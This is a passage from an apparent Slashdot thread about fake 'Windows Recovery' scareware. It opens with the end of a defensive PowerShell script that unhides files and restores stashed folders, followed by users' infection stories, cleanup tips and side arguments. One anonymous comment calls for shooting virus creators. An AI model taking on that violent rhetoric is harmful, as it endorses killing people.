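        param([string]$StashRoot, [hashtable]$Map)
        if (-not (Test-Path -LiteralPath $StashRoot)) {
            Write-Warning "$StashRoot not found: nothing was stashed, or %TEMP% was already cleaned out."
            return
        }
        foreach ($sub in @(Get-ChildItem -LiteralPath $StashRoot -Force | Where-Object { $_.PSIsContainer })) {
            if (-not $Map.ContainsKey($sub.Name)) {
                Write-Warning "Unmapped stash folder $($sub.FullName): inspect it by hand before deleting anything."
                continue
            }
            $dest = $Map[$sub.Name]
            if ($PSCmdlet.ShouldProcess("$($sub.FullName) -> $dest", 'Copy stashed items back')) {
                New-Item -ItemType Directory -Path $dest -Force | Out-Null
                # Copy rather than move: keep the stash until the user confirms everything is back.
                Copy-Item -Path (Join-Path $sub.FullName '*') -Destination $dest -Recurse -Force
            }
        }
    }

    $mask  = [int]$ClearFlags
    $count = Restore-Visibility -Path $Root -Mask $mask
    Write-Host "Cleared [$ClearFlags] on $count item(s) under $Root"
    Restore-Stash -StashRoot $Stash -Map $StashMap
    ```

    Run it with `-WhatIf` first: `ShouldProcess` then prints every attribute change and every stash copy without doing any of them, which is how you confirm the `$StashMap` guess and catch a variant that hid more than the profile (rerun with `-Root C:\` for the whole-drive variant). When `System` is part of `-ClearFlags`, only the junction test and the `$KeepHidden` list protect Windows' own files, so inspect the `-WhatIf` output with more care. The stash is copied, not moved, so it can be deleted by hand once the user confirms that their Start Menu and Quick Launch are complete.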

  40. It's prolific - not just for IE. by Anonymous Coward · · Score: 0

    It's prolific - not just for IE. I have seen 4 infections since about Mar-30. I would not call this a new malware but an update of the old WindowsRecovery / WindowsRepair trojan strain. The thing that really sucks is, I am carefully anti-clicky but this effin thing still got through, and I don't really know how. Infection #1 on Windows 7 fully patched, MSE AV with Firefox+NoScript, while browsing NON-porn forums on, what, flashlights - went to freakin' blue screen! Infection #2 on a corporate Windows XP (supposedly patched, TrendMicro AV with IE8), while browsing forums on tablets. Infection #3 on a typical idiot coworker's personal notebook, Windows 7 with nothing. Infection #4 on the same #1 machine, cleaned up, but this time on browsing porn. Not much in common denominators. The only saving grace is that it was not destructive yet. But it stopped TaskMgr and System Recovery, and it was a significant pain in the ass until I worked out a standard method of cleaning - now I keep the tools on a keychain drive all the time. It won't be the last time it shows up, and I'm concerned that a new strain will be destructive.

    FYI If you get this infection then directions at www.bleepingcomputer.com are useful.

  41. They dont have a repository? by nurb432 · · Score: 1

    What is this then? http://www.microsoft.com/web/downloads/platform.aspx I used it just this week to install sql express...

    And i'm not a fan of Microsoft either, but lets not use lies to attack them with.

    --
    ---- Booth was a patriot ----
    1. Re:They dont have a repository? by Attila+Dimedici · · Score: 1

      What is this then? http://www.microsoft.com/web/downloads/platform.aspx I used it just this week to install sql express...

      And i'm not a fan of Microsoft either, but lets not use lies to attack them with.

      That would be a place to get some Microsoft software, but I did not see any games, money management software, book inventory software, video inventory software, etc. So, it is not quite the same. If you can think of using a PC to do a task, there is probably software in the repository of a given Linux distro to do it (not necessarily very good software, but nevertheless, something).

      --
      The truth is that all men having power ought to be mistrusted. James Madison
    2. Re:They dont have a repository? by nurb432 · · Score: 1

      I agree its *limited*, but saying they don't have one at all is somewhat dishonest.

      --
      ---- Booth was a patriot ----
    3. Re:They dont have a repository? by Attila+Dimedici · · Score: 1

      Have you ever used a Linux distro? Have you ever seen what their repositories look like?
      I use Windows much more than I use Linux because there is software I use that does not have counterparts on Linux. I don't dislike Windows. The "repository" you pointed out has nothing that an ordinary user would use.

      --
      The truth is that all men having power ought to be mistrusted. James Madison
  42. We need whitelisting. by Zaphod-AVA · · Score: 1

    Until the security industry switches from blacklisting to whitelisting, the malware industry will thrive.

    We need a centrally managed service people subscribe to that automatically adds programs from known legitimate vendors and their updates, so that the whitelist only blocks unusual executables.

    1. Re:We need whitelisting. by Anonymous Coward · · Score: 0

      Sounds like the App Store.

      Do you *really* want that?

  43. This happened to me. by Anonymous Coward · · Score: 0

    I had this happen a couple of months ago, but I think it was called "Windows Repair", not Recovery. It fouled up everything and hid my files, and I couldn't do anything, including shut down the computer. I unplugged it, and signed in to a different user account. Got Malwarebytes to remove the malware, and found info online on how to unhide folders of apparently missing files. No way would I pay money for a message on my screen. That is the number one way to know it is not legit or coming from your own computer system. I've got Windows 7 and have since gotten WinPatrol and AdMuncher, and I think those two programs are going to be very helpful in preventing at least some problems.

  44. Where's our government? by Anonymous Coward · · Score: 0

    Isn't our government supposed to protect us from crime? Hey, how about shoving some bullets in the brains of these virus creators instead of shoving individual mandates up our asses?

  45. Hidden file attribute variation... by Anonymous Coward · · Score: 0

    I came across something similar, where the malware simply turned on the hidden file attribute on everything on the hard drive. Windows would boot, but none of the program links could be found. Fixing it turned out to be a real pain in the butt, because the software was some sort of rootkit, but at least none of the files were lost--which was what the user had assumed when the hard drive appeared empty. Rooted it out with combofix and then unhid the files. I was stymied for a bit over what was going on. Really irritating.

  46. Fighting Back by Anonymous Coward · · Score: 0

    Why can't State Attorneys General go after Visa and Mastercard for cooperating with the malware firms?